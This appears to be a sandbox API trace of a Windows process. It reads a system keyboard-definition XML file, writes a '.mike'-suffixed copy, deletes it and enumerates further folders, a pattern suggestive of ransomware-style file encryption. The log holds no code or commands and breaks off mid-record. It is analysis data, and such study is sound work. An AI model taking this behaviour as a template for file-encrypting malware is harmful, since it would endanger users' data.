GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", lpFilePart=0x0) returned 0x53 [0045.666] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", lpFilePart=0x0) returned 0x53 [0045.666] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", lpFilePart=0x0) returned 0x53 [0045.666] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike", lpFilePart=0x0) returned 0x58 [0045.666] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0045.666] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af08c | out: lpFileInformation=0x2af08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.666] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0045.666] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike", lpFilePart=0x0) returned 0x58 [0045.666] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0045.666] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.667] GetFileType (hFile=0x264) returned 0x1 [0045.667] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0045.667] GetFileType (hFile=0x264) returned 0x1 [0045.667] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0045.667] WriteFile (in: hFile=0x264, lpBuffer=0x2166d14*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x2166d14*, lpNumberOfBytesWritten=0x2af02c*=0x220, lpOverlapped=0x0) returned 1 [0045.668] CloseHandle (hObject=0x264) returned 1 [0045.668] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0045.668] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), fInfoLevelId=0x0, lpFileInformation=0x21667d0 | out: lpFileInformation=0x21667d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cb5dcd, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1cb5dcd, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f4ecf1b, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x188)) returned 1 [0045.668] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0045.668] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", lpFilePart=0x0) returned 0x53 [0045.668] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0045.668] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.668] GetFileType (hFile=0x264) returned 0x1 [0045.668] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0045.668] GetFileType (hFile=0x264) returned 0x1 [0045.668] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0x0 [0045.668] ReadFile (in: hFile=0x264, lpBuffer=0x2167e54, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x2167e54*, lpNumberOfBytesRead=0x2af038*=0x188, lpOverlapped=0x0) returned 1 [0045.669] CloseHandle (hObject=0x264) returned 1 [0045.670] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike", lpFilePart=0x0) returned 0x58 [0045.670] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0045.670] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.670] GetFileType (hFile=0x264) returned 0x1 [0045.670] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0045.670] GetFileType (hFile=0x264) returned 0x1 [0045.670] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0045.670] WriteFile (in: hFile=0x264, lpBuffer=0x216b65c*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x216b65c*, lpNumberOfBytesWritten=0x2af02c*=0x190, lpOverlapped=0x0) returned 1 [0045.670] CloseHandle (hObject=0x264) returned 1 [0045.671] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeac0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike", lpFilePart=0x0) returned 0x58 [0045.671] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefb4) returned 1 [0045.671] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.671] GetFileType (hFile=0x264) returned 0x1 [0045.671] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefb0) returned 1 [0045.671] GetFileType (hFile=0x264) returned 0x1 [0045.672] WriteFile (in: hFile=0x264, lpBuffer=0x216e8a0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x216e8a0*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0045.672] CloseHandle (hObject=0x264) returned 1 [0045.673] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", lpFilePart=0x0) returned 0x53 [0045.673] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike", lpFilePart=0x0) returned 0x58 [0045.674] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0045.674] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe56cf8a0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe56cf8a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe56cf8a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x3b0)) returned 1 [0045.674] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0045.674] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", lpFilePart=0x0) returned 0x53 [0045.674] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike", lpFilePart=0x0) returned 0x58 [0045.674] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.674] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x21700d4 | out: lpFileInformation=0x21700d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe56cf8a0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe56cf8a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe56cf8a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x3b0)) returned 1 [0045.674] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.674] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", lpFilePart=0x0) returned 0x53 [0045.674] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", dwFileAttributes=0x80) returned 0 [0045.675] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", lpFilePart=0x0) returned 0x53 [0045.675] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike", lpFilePart=0x0) returned 0x58 [0045.675] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe0) returned 1 [0045.675] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af05c | out: lpFileInformation=0x2af05c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe56cf8a0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe56cf8a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe56cf8a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x3b0)) returned 1 [0045.675] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefdc) returned 1 [0045.675] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", lpFilePart=0x0) returned 0x53 [0045.675] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike", lpFilePart=0x0) returned 0x58 [0045.676] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike")) returned 1 [0045.676] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0045.677] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad", lpFilePart=0x0) returned 0x47 [0045.677] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\", nBufferLength=0x105, lpBuffer=0x2aec38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\", lpFilePart=0x0) returned 0x48 [0045.677] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe56cf8a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe56cf8a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0045.677] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe56cf8a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe56cf8a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.677] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f4a0c5f, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f4a0c5f, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f4c6dbd, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x180, dwReserved0=0x0, dwReserved1=0x0, cFileName="ea.xml", cAlternateFileName="")) returned 1 [0045.677] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c8fc70, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1c8fc70, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f4c6dbd, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="keypadbase.xml", cAlternateFileName="")) returned 1 [0045.677] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cb5dcd, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1cb5dcd, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f4ecf1b, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x188, dwReserved0=0x0, dwReserved1=0x0, cFileName="kor-kor.xml", cAlternateFileName="")) returned 1 [0045.677] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cb5dcd, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1cb5dcd, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f4ecf1b, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x188, dwReserved0=0x0, dwReserved1=0x0, cFileName="kor-kor.xml", cAlternateFileName="")) returned 0 [0045.678] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0045.678] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0045.678] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0045.678] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\.", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main", lpFilePart=0x0) returned 0x45 [0045.678] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0045.678] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.678] CoTaskMemFree (pv=0x4fe370) [0045.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0045.678] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0045.678] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0045.712] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.712] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f643b69, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f643b69, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f643b69, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xc4e, dwReserved0=0x0, dwReserved1=0x0, cFileName="base.xml", cAlternateFileName="")) returned 1 [0045.713] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e7ee29, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1e7ee29, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f6b5f83, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xf7, dwReserved0=0x0, dwReserved1=0x0, cFileName="baseAltGr_rtl.xml", cAlternateFileName="")) returned 1 [0045.713] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c8fc70, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1c8fc70, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f643b69, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xc59, dwReserved0=0x0, dwReserved1=0x0, cFileName="base_altgr.xml", cAlternateFileName="")) returned 1 [0045.713] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cb5dcd, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1cb5dcd, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f669cc7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xc5e, dwReserved0=0x0, dwReserved1=0x0, cFileName="base_ca.xml", cAlternateFileName="")) returned 1 [0045.713] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cdbf2a, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1cdbf2a, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f68fe25, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="base_heb.xml", cAlternateFileName="")) returned 1 [0045.713] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d02087, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d02087, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f68fe25, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x324, dwReserved0=0x0, dwReserved1=0x0, cFileName="base_jpn.xml", cAlternateFileName="")) returned 1 [0045.713] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d02087, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d02087, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f68fe25, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="base_kor.xml", cAlternateFileName="")) returned 1 [0045.713] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d281e4, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d281e4, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f6b5f83, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x269, dwReserved0=0x0, dwReserved1=0x0, cFileName="base_rtl.xml", cAlternateFileName="")) returned 1 [0045.713] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d4e341, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d4e341, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f6dc0e1, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x40e8, dwReserved0=0x0, dwReserved1=0x0, 